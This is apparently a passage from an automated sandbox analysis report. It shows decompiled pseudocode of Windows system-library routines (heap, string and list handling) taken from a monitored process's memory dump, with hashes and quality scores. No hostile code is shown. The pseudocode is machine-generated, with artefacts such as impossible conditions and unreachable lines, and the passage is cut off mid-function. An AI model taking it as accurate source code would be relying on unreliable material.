                        						if(_t61 != 0) {
                        							asm("lock xadd [esi], eax");
                        							if((_t32 | 0xffffffff) == 0) {
                        								_push( *((intOrPtr*)(_t61 + 4)));
                        								E02B395D0();
                        								L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        							}
                        						} else {
                        							E02B0EB70(_t54, 0x2be79a0);
                        						}
                        						return _t52;
                        					}
                        					L5:
                        					_t33 = E02B3F3E0(_a8, _t54, _t52);
                        					if(_t61 == 0) {
                        						E02B0EB70(_t54, 0x2be79a0);
                        					} else {
                        						asm("lock xadd [esi], eax");
                        						if((_t33 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02B395D0();
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					}
                        					_t35 = _a8;
                        					if(_t60 <= 1) {
                        						L9:
                        						_t60 = _t60 - 1;
                        						 *((short*)(_t52 + _t35 - 2)) = 0;
                        						goto L10;
                        					} else {
                        						_t56 = 0x3a;
                        						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                        							 *((short*)(_t52 + _t35)) = 0;
                        							L10:
                        							return _t60 + _t60;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 074ce8a1bd19452f3fa5a4a35d57c37df9f3e3255a6342694d02d9e93e3a88b7
                        • Instruction ID: 79ba833688be56f02e608e7fca6caf87214a9ce7740e53220ed46d4b78b46a49
                        • Opcode Fuzzy Hash: 074ce8a1bd19452f3fa5a4a35d57c37df9f3e3255a6342694d02d9e93e3a88b7
                        • Instruction Fuzzy Hash: 8331F432641A10EBC726AB58C880B66B7B6FF14760F518B99FD560B5E0DF75E840CA90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02B2A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				intOrPtr _t39;
                        				intOrPtr _t45;
                        				intOrPtr* _t51;
                        				intOrPtr* _t52;
                        				intOrPtr* _t55;
                        				signed int _t57;
                        				intOrPtr* _t59;
                        				intOrPtr _t68;
                        				intOrPtr* _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t81;
                        				char* _t82;
                        				void* _t83;
                        
                        				_push(0x24);
                        				_push(0x2bd0220);
                        				E02B4D08C(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                        				_t79 = __ecx;
                        				_t35 =  *0x2be7b9c; // 0x0
                        				_t55 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                        				if(_t55 == 0) {
                        					_t39 = 0xc0000017;
                        					L11:
                        					return E02B4D0D1(_t39);
                        				}
                        				_t68 = 0;
                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                        				_t7 = _t55 + 8; // 0x8
                        				_t57 = 6;
                        				memcpy(_t7, _t79, _t57 << 2);
                        				_t80 = 0xfffffffe;
                        				 *(_t83 - 4) = _t80;
                        				if(0 < 0) {
                        					L14:
                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        					L20:
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                        					_t39 = _t81;
                        					goto L11;
                        				}
                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                        					_t81 = 0xc000007b;
                        					goto L20;
                        				}
                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                        					_t45 =  *_t59;
                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                        					 *_t59 = _t45 + 1;
                        					L6:
                        					 *(_t83 - 4) = 1;
                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *(_t83 - 4) = _t80;
                        					if(_t68 < 0) {
                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                        						if(_t82 == 0) {
                        							goto L14;
                        						}
                        						asm("btr eax, ecx");
                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        						if( *_t82 != 0) {
                        							 *0x2be7b10 =  *0x2be7b10 - 8;
                        						}
                        						goto L20;
                        					}
                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                        					_t51 =  *0x2be536c; // 0x603fb0
                        					if( *_t51 != 0x2be5368) {
                        						_push(3);
                        						asm("int 0x29");
                        						goto L14;
                        					}
                        					 *_t55 = 0x2be5368;
                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                        					 *_t51 = _t55;
                        					 *0x2be536c = _t55;
                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                        					if(_t52 != 0) {
                        						 *_t52 = _t55;
                        					}
                        					_t39 = 0;
                        					goto L11;
                        				}
                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                        				_t68 = E02B2A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                        				if(_t68 < 0) {
                        					goto L14;
                        				}
                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                        				goto L6;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58a00c496158e7bd6fad57aabb5c7c328ecb7626e51f061b3459f244b0f38136
                        • Instruction ID: 9b1e7084773bd04947b767ffa3d961b6e2c6f2e37a89b880b592814fdd8eb1e2
                        • Opcode Fuzzy Hash: 58a00c496158e7bd6fad57aabb5c7c328ecb7626e51f061b3459f244b0f38136
                        • Instruction Fuzzy Hash: 4E4136B5A01315DFCB15CF68C490BA9BBF2FB49714F1980A9E909AF354C778A901CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B33D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed short** _t33;
                        				short* _t38;
                        				intOrPtr* _t39;
                        				intOrPtr* _t41;
                        				signed short _t43;
                        				intOrPtr* _t47;
                        				intOrPtr* _t53;
                        				signed short _t57;
                        				intOrPtr _t58;
                        				signed short _t60;
                        				signed short* _t61;
                        
                        				_t47 = __ecx;
                        				_t61 = __edx;
                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                        				if(_t60 > 0xfffe) {
                        					L22:
                        					return 0xc0000106;
                        				}
                        				if(__edx != 0) {
                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                        						L5:
                        						E02B07B60(0, _t61, 0x2ad11c4);
                        						_v12 =  *_t47;
                        						_v12 = _v12 + 0xfff8;
                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                        						E02B07B60(0xfff8, _t61,  &_v12);
                        						_t33 = _a8;
                        						if(_t33 != 0) {
                        							 *_t33 = _t61;
                        						}
                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                        						_t53 = _a12;
                        						if(_t53 != 0) {
                        							_t57 = _t61[2];
                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                        							while(_t38 >= _t57) {
                        								if( *_t38 == 0x5c) {
                        									_t41 = _t38 + 2;
                        									if(_t41 == 0) {
                        										break;
                        									}
                        									_t58 = 0;
                        									if( *_t41 == 0) {
                        										L19:
                        										 *_t53 = _t58;
                        										goto L7;
                        									}
                        									 *_t53 = _t41;
                        									goto L7;
                        								}
                        								_t38 = _t38 - 2;
                        							}
                        							_t58 = 0;
                        							goto L19;
                        						} else {
                        							L7:
                        							_t39 = _a16;
                        							if(_t39 != 0) {
                        								 *_t39 = 0;
                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                        							}
                        							return 0;
                        						}
                        					}
                        					_t61 = _a4;
                        					if(_t61 != 0) {
                        						L3:
                        						_t43 = L02B14620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                        						_t61[2] = _t43;
                        						if(_t43 == 0) {
                        							return 0xc0000017;
                        						}
                        						_t61[1] = _t60;
                        						 *_t61 = 0;
                        						goto L5;
                        					}
                        					goto L22;
                        				}
                        				_t61 = _a4;
                        				if(_t61 == 0) {
                        					return 0xc000000d;
                        				}
                        				goto L3;
                        			}

















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a55f279d2f740d6f89e98a637fb827d05063a060ecbad1c1e7b6c5204ad36f35
                        • Instruction ID: 178431f019208b1d4506568a299897af236e3bbdcea5e2cf8b4ffc2cfb04540f
                        • Opcode Fuzzy Hash: a55f279d2f740d6f89e98a637fb827d05063a060ecbad1c1e7b6c5204ad36f35
                        • Instruction Fuzzy Hash: 72319E35A05625DBC7268F2DD885A7BBBF5EF45710B0580EAE84ACB350EB34D840C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02B77016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                        				signed int _v8;
                        				char _v588;
                        				intOrPtr _v592;
                        				intOrPtr _v596;
                        				signed short* _v600;
                        				char _v604;
                        				short _v606;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short* _t55;
                        				void* _t56;
                        				signed short* _t58;
                        				signed char* _t61;
                        				char* _t68;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t75;
                        
                        				_t64 = __edx;
                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                        				_v8 =  *0x2bed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                        				_t55 = _a16;
                        				_v606 = __ecx;
                        				_t71 = 0;
                        				_t58 = _a12;
                        				_v596 = __edx;
                        				_v600 = _t58;
                        				_t68 =  &_v588;
                        				if(_t58 != 0) {
                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                        					if(_t55 != 0) {
                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                        					}
                        				}
                        				_t8 = _t71 + 0x2a; // 0x28
                        				_t33 = _t8;
                        				_v592 = _t8;
                        				if(_t71 <= 0x214) {
                        					L6:
                        					 *((short*)(_t68 + 6)) = _v606;
                        					if(_t64 != 0xffffffff) {
                        						asm("cdq");
                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                        						 *((char*)(_t68 + 0x28)) = _a4;
                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                        						 *((char*)(_t68 + 0x29)) = _a8;
                        						if(_t71 != 0) {
                        							_t22 = _t68 + 0x2a; // 0x2a
                        							_t64 = _t22;
                        							E02B76B4C(_t58, _t22, _t71,  &_v604);
                        							if(_t55 != 0) {
                        								_t25 = _v604 + 0x2a; // 0x2a
                        								_t64 = _t25 + _t68;
                        								E02B76B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                        							}
                        							if(E02B17D50() == 0) {
                        								_t61 = 0x7ffe0384;
                        							} else {
                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							}
                        							_push(_t68);
                        							_push(_v592 + 0xffffffe0);
                        							_push(0x402);
                        							_push( *_t61 & 0x000000ff);
                        							E02B39AE0();
                        						}
                        					}
                        					_t35 =  &_v588;
                        					if( &_v588 != _t68) {
                        						_t35 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                        					}
                        					L16:
                        					_pop(_t69);
                        					_pop(_t72);
                        					_pop(_t56);
                        					return E02B3B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                        				}
                        				_t68 = L02B14620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                        				if(_t68 == 0) {
                        					goto L16;
                        				} else {
                        					_t58 = _v600;
                        					_t64 = _v596;
                        					goto L6;
                        				}
                        			}























                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cec6042ba6d1d5420f33d7102b0de90b78682b1e66ebba0ef8d17f543bb81949
                        • Instruction ID: 27d42e28b2b8be2e82056f43034f849a64f523227c36c90a80c5bddcc5d08e65
                        • Opcode Fuzzy Hash: cec6042ba6d1d5420f33d7102b0de90b78682b1e66ebba0ef8d17f543bb81949
                        • Instruction Fuzzy Hash: 9031C2726047519FC321DF28C841A6AF7E9FF88704F044A69F8A587790EB30E904DBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E02B1C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                        				signed int* _v8;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t33;
                        				signed char _t43;
                        				signed char _t48;
                        				signed char _t62;
                        				void* _t63;
                        				intOrPtr _t69;
                        				intOrPtr _t71;
                        				unsigned int* _t82;
                        				void* _t83;
                        
                        				_t80 = __ecx;
                        				_t82 = __edx;
                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                        				if((_t33 & 0x00000001) != 0) {
                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                        					if(E02B17D50() != 0) {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					} else {
                        						_t43 = 0x7ffe0386;
                        					}
                        					if( *_t43 != 0) {
                        						_t43 = E02BC8D34(_v8, _t80);
                        					}
                        					E02B12280(_t43, _t82);
                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                        						E02B0FFB0(_t62, _t80, _t82);
                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                        						_t30 = _t80 + 0xd0; // 0xd0
                        						_t83 = _t30;
                        						E02BC8833(_t83,  &_v16);
                        						_t81 = _t80 + 0x90;
                        						E02B0FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                        						_t63 = 0;
                        						_push(0);
                        						_push(_t83);
                        						_t48 = E02B3B180();
                        						if(_a4 != 0) {
                        							E02B12280(_t48, _t81);
                        						}
                        					} else {
                        						_t69 = _v8;
                        						_t12 = _t80 + 0x98; // 0x98
                        						_t13 = _t69 + 0xc; // 0x575651ff
                        						E02B1BB2D(_t13, _t12);
                        						_t71 = _v8;
                        						_t15 = _t80 + 0xb0; // 0xb0
                        						_t16 = _t71 + 8; // 0x8b000cc2
                        						E02B1BB2D(_t16, _t15);
                        						E02B1B944(_v8, _t62);
                        						 *((char*)(_t80 + 0xdc)) = 0;
                        						E02B0FFB0(0, _t80, _t82);
                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                        						 *(_t80 + 0xde) = 0;
                        						if(_a4 == 0) {
                        							_t25 = _t80 + 0x90; // 0x90
                        							E02B0FFB0(0, _t80, _t25);
                        						}
                        						_t63 = 1;
                        					}
                        					return _t63;
                        				}
                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                        				if(_a4 == 0) {
                        					_t24 = _t80 + 0x90; // 0x90
                        					E02B0FFB0(0, __ecx, _t24);
                        				}
                        				return 0;
                        			}

















                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction ID: 9759f17723e6c2534aa61c20791d57a81ac709c3f3ddb8c87367f58e04b25cb8
                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                        • Instruction Fuzzy Hash: D1312471B41586ABD709EBB4C480BFAFB65FF52344F5441DBC41847241CB386A5ACBE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E02BA3D40(intOrPtr __ecx, char* __edx) {
                        				signed int _v8;
                        				char* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				signed char _v24;
                        				char _v28;
                        				char _v29;
                        				intOrPtr* _v32;
                        				char _v36;
                        				char _v37;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed char _t34;
                        				intOrPtr* _t37;
                        				intOrPtr* _t42;
                        				intOrPtr* _t47;
                        				intOrPtr* _t48;
                        				intOrPtr* _t49;
                        				char _t51;
                        				void* _t52;
                        				intOrPtr* _t53;
                        				char* _t55;
                        				char _t59;
                        				char* _t61;
                        				intOrPtr* _t64;
                        				void* _t65;
                        				char* _t67;
                        				void* _t68;
                        				signed int _t70;
                        
                        				_t62 = __edx;
                        				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                        				_v8 =  *0x2bed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                        				_t34 =  &_v28;
                        				_v20 = __ecx;
                        				_t67 = __edx;
                        				_v24 = _t34;
                        				_t51 = 0;
                        				_v12 = __edx;
                        				_v29 = 0;
                        				_v28 = _t34;
                        				E02B12280(_t34, 0x2be8a6c);
                        				_t64 =  *0x2be5768; // 0x77f05768
                        				if(_t64 != 0x2be5768) {
                        					while(1) {
                        						_t8 = _t64 + 8; // 0x77f05770
                        						_t42 = _t8;
                        						_t53 = _t64;
                        						 *_t42 =  *_t42 + 1;
                        						_v16 = _t42;
                        						E02B0FFB0(_t53, _t64, 0x2be8a6c);
                        						 *0x2beb1e0(_v24, _t67);
                        						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                        							_v37 = 1;
                        						}
                        						E02B12280(_t45, 0x2be8a6c);
                        						_t47 = _v28;
                        						_t64 =  *_t64;
                        						 *_t47 =  *_t47 - 1;
                        						if( *_t47 != 0) {
                        							goto L8;
                        						}
                        						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                        							L10:
                        							_push(3);
                        							asm("int 0x29");
                        						} else {
                        							_t48 =  *((intOrPtr*)(_t53 + 4));
                        							if( *_t48 != _t53) {
                        								goto L10;
                        							} else {
                        								 *_t48 = _t64;
                        								_t61 =  &_v36;
                        								 *((intOrPtr*)(_t64 + 4)) = _t48;
                        								_t49 = _v32;
                        								if( *_t49 != _t61) {
                        									goto L10;
                        								} else {
                        									 *_t53 = _t61;
                        									 *((intOrPtr*)(_t53 + 4)) = _t49;
                        									 *_t49 = _t53;
                        									_v32 = _t53;
                        									goto L8;
                        								}
                        							}
                        						}
                        						L11:
                        						_t51 = _v29;
                        						goto L12;
                        						L8:
                        						if(_t64 != 0x2be5768) {
                        							_t67 = _v20;
                        							continue;
                        						}
                        						goto L11;
                        					}
                        				}
                        				L12:
                        				E02B0FFB0(_t51, _t64, 0x2be8a6c);
                        				while(1) {
                        					_t37 = _v28;
                        					_t55 =  &_v28;
                        					if(_t37 == _t55) {
                        						break;
                        					}
                        					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                        						goto L10;
                        					} else {
                        						_t59 =  *_t37;
                        						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                        							goto L10;
                        						} else {
                        							_t62 =  &_v28;
                        							_v28 = _t59;
                        							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                        							continue;
                        						}
                        					}
                        					L18:
                        				}
                        				_pop(_t65);
                        				_pop(_t68);
                        				_pop(_t52);
                        				return E02B3B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                        				goto L18;
                        			}


































                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: df42b0996043d01cc9bbb503485d4247b24a4f90a24db2020ad2b82da2309f87
                        • Instruction ID: a8ed0ccbc4e1057b7c2f57c4e9de43447b5327dbcd627d090de5e8bf4afdf40d
                        • Opcode Fuzzy Hash: df42b0996043d01cc9bbb503485d4247b24a4f90a24db2020ad2b82da2309f87
                        • Instruction Fuzzy Hash: DC317971649302DFCB24DF24C59091ABBE1FF85704F4449EEF4999B250D730D904CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02B2A70E(intOrPtr* __ecx, char* __edx) {
                        				unsigned int _v8;
                        				intOrPtr* _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t28;
                        				char* _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t38;
                        				void* _t50;
                        				intOrPtr _t52;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t52 =  *0x2be7b10; // 0x8
                        				_t33 = __edx;
                        				_t48 = __ecx;
                        				_v12 = __ecx;
                        				if(_t52 == 0) {
                        					 *0x2be7b10 = 8;
                        					 *0x2be7b14 = 0x2be7b0c;
                        					 *0x2be7b18 = 1;
                        					L6:
                        					_t2 = _t52 + 1; // 0x9
                        					E02B2A990(0x2be7b10, _t2, 7);
                        					asm("bts ecx, eax");
                        					 *_t48 = _t52;
                        					 *_t33 = 1;
                        					L3:
                        					_t16 = 0;
                        					L4:
                        					return _t16;
                        				}
                        				_t17 = L02B2A840(__edx, __ecx, __ecx, _t52, 0x2be7b10, 1, 0);
                        				if(_t17 == 0xffffffff) {
                        					_t37 =  *0x2be7b10; // 0x8
                        					_t3 = _t37 + 0x27; // 0x2f
                        					__eflags = _t3 >> 5 -  *0x2be7b18; // 0x1
                        					if(__eflags > 0) {
                        						_t38 =  *0x2be7b9c; // 0x0
                        						_t4 = _t52 + 0x27; // 0x2f
                        						_v8 = _t4 >> 5;
                        						_t50 = L02B14620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                        						__eflags = _t50;
                        						if(_t50 == 0) {
                        							_t16 = 0xc0000017;
                        							goto L4;
                        						}
                        						 *0x2be7b18 = _v8;
                        						_t8 = _t52 + 7; // 0xf
                        						E02B3F3E0(_t50,  *0x2be7b14, _t8 >> 3);
                        						_t28 =  *0x2be7b14; // 0x77f07b0c
                        						__eflags = _t28 - 0x2be7b0c;
                        						if(_t28 != 0x2be7b0c) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        						}
                        						_t9 = _t52 + 8; // 0x10
                        						 *0x2be7b14 = _t50;
                        						_t48 = _v12;
                        						 *0x2be7b10 = _t9;
                        						goto L6;
                        					}
                        					 *0x2be7b10 = _t37 + 8;
                        					goto L6;
                        				}
                        				 *__ecx = _t17;
                        				 *_t33 = 0;
                        				goto L3;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e83e462d513372f930e2b515ce818cca63af18c06b26238626bd3040e519c15b
                        • Instruction ID: 83f906b9d3da0f8382add0721f7b364c4bb03be1843810cc3842ffeda6df8ea5
                        • Opcode Fuzzy Hash: e83e462d513372f930e2b515ce818cca63af18c06b26238626bd3040e519c15b
                        • Instruction Fuzzy Hash: 4F31AFB1A60211DBDB11CB28E8A0F65B7F9FF84750F144DDAE0099B250DB70A915DB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E02AFAA16(signed short* __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed short _v16;
                        				intOrPtr _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				void* _v32;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t25;
                        				signed short _t38;
                        				signed short* _t42;
                        				signed int _t44;
                        				signed short* _t52;
                        				signed short _t53;
                        				signed int _t54;
                        
                        				_v8 =  *0x2bed360 ^ _t54;
                        				_t42 = __ecx;
                        				_t44 =  *__ecx & 0x0000ffff;
                        				_t52 =  &(__ecx[2]);
                        				_t51 = _t44 + 2;
                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                        					L4:
                        					_t25 =  *0x2be7b9c; // 0x0
                        					_t53 = L02B14620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                        					__eflags = _t53;
                        					if(_t53 == 0) {
                        						L3:
                        						return E02B3B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                        					} else {
                        						E02B3F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                        						L2:
                        						_t51 = 4;
                        						if(L02B06C59(_t53, _t51, _t58) != 0) {
                        							_t28 = E02B25E50(0x2adc338, 0, 0,  &_v32);
                        							__eflags = _t28;
                        							if(_t28 == 0) {
                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                        								__eflags = _t38;
                        								_v24 = _t53;
                        								_v16 = _t38;
                        								_v20 = 0;
                        								_v12 = 0;
                        								E02B2B230(_v32, _v28, 0x2adc2d8, 1,  &_v24);
                        								_t28 = E02AFF7A0(_v32, _v28);
                        							}
                        							__eflags = _t53 -  *_t52;
                        							if(_t53 !=  *_t52) {
                        								_t28 = L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						goto L3;
                        					}
                        				}
                        				_t53 =  *_t52;
                        				_t44 = _t44 >> 1;
                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 58936e503ab63e2dc72662ee33a566717edef38852f70a95c9903f9f14dc0b68
                        • Instruction ID: 0f71b02a74e4358069407af2e6a720e5e3e520a7704a356356c293bbc7f8e734
                        • Opcode Fuzzy Hash: 58936e503ab63e2dc72662ee33a566717edef38852f70a95c9903f9f14dc0b68
                        • Instruction Fuzzy Hash: 6031D671940229EBCF11AFA4CD81ABFB7B9EF04700B4444A9F905DB250EB749950DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02B261A0(signed int* __ecx) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				void* _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t49;
                        				signed int _t51;
                        				intOrPtr _t52;
                        				signed int _t54;
                        				void* _t59;
                        				signed int* _t61;
                        				intOrPtr* _t64;
                        
                        				_t61 = __ecx;
                        				_v12 = 0;
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        				_v16 = __ecx;
                        				_v8 = 0;
                        				if(_t30 == 0) {
